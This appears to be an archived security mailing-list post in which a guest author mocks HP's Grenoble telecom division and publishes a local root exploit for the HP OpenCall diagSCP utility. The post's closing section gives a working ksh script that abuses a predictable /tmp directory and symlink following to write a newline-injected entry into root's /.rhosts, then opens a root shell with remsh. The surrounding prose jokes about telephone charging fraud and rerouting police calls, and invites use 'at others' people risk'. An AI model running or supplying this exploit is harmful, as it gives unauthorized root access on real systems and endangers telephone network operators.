Other Folks Scripts

[aleph1 () dfw net (Aleph One)]

   Guest Scriptor: Otto Sync
   Exploit: OpenCall platform bug
   Shout out: Thanks, Otto, we couldn't have said it better ourselves!

   Sure you all see Hewlett Packard as the pure American company, and you
   blame all these Yankee coders for the bugs that we see here week after
   week. Grossihre erreur ! la connerie est distribuie uniformiment.Today
   we're going to investigate the French arm of HP, located in Grenoble
   in the Alps, in this division where the most elite products come from:
   the Telecommunication Network Organisation. Coucou ` tous les
   Grenoblois ! Near the mountains are developed products such as their
   IN (Intelligent Network) platforms, and the OpenCall SCP software is
   being written by half drunk French skiers who thought HP stands for
   "Habitation Prolongie" (long term accommodation). Sans blague, arretez
   l*alcool entre midi et deux, iteignez ce minitel connecti sur 3615
   ANALSEX et pensez ` tous ces Opirateurs en danger ` cause de vos
   pratiques de programmation douteuses.

   Shall we tell you that HP delivers their IN platform with umask 000 as
   a default and don*t see this as a problem ? Les cons ! Do you want to
   know how some of their log files keep being 666 and want to overwrite
   any the root*s files ? Si si, c*est vrai ! No, let*s deal with
   something more fancy, the guys at SOD would be disappointed to see
   such trivial exploits. Ils ont plus d*un tour dans leur sac, ces
   sacris scripteurs.

   While I*m here as a guest scriptor, one word for HP executives and
   lawyers. Oui, mjme ceux qui ` Grenoble pensent concentrer toute
   l*intelligence humaine en un seul endroit. Make the SOD guys a decent
   offer, give them some contract work to start with, maybe a nice
   package with a Maserati company car and one all-year ski pass. Bon,
   d*accord, ca peut jtre une voiture francaise mais pas une Citrokn.
   Think about all the unreleased bugs ! Think about your children !
   Think about endangered species ! Soyez raisonnables, vous allez bien
   leur trouver une petite place bien au chaud avec vue sur le Mont
   Blanc. La survie de l*humaniti est en jeu.

   Revenons-en au bug si vous le voulez bien. All right it*s not every
   day that you come across a SCP but remember that most phone network
   operators have or will have one. And when you know that this gentle
   high-available system can control every signalling message at various
   detection points in the call model, you start to wonder. What about
   creating a special IN service that entitles all your outgoing calls to
   a 99% charging discount ? Would you have fun rerouting all calls
   directed at the police station to HP*s helpdesk ? Est-ce que vous
   rialisez enfin que votre code ` la vite-fait met en danger la
   stabiliti des riseaux sur lesquels ils sont installis ?

   Have a look at the code. It*s self-explanatory. Use at others* people
   risk.
     _________________________________________________________________
BUG1: diagSCP

Synopsis
========

The diagSCP utility creates a temporary directory in /tmp with a predictable
name.  It will also happily follow any evil symlink you put in. The 'env' file
created by diagSCP in this directory contains the user's environment and is
thus subject to customization.  We just have to insert some ^J in a variable
to have it go to the next line, so it looks like a valid entry in .rhosts

Exploit
=======

#!/bin/ksh
FILE=/.rhosts
NEXT=`expr $$ + 5`
mkdir /tmp/diagSCP.$NEXT
ln -s $FILE /tmp/diagSCP.$NEXT/env
export GUESSWHAT="
localhost `whoami`"
diagSCP &
sleep 2
kill $NEXT
echo "\nFrench kiss ? root kiss !\n"
remsh localhost -l root ksh -i


Aleph One / aleph1 () dfw net
http://underground.org/
KeyID 1024/948FD6B5
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01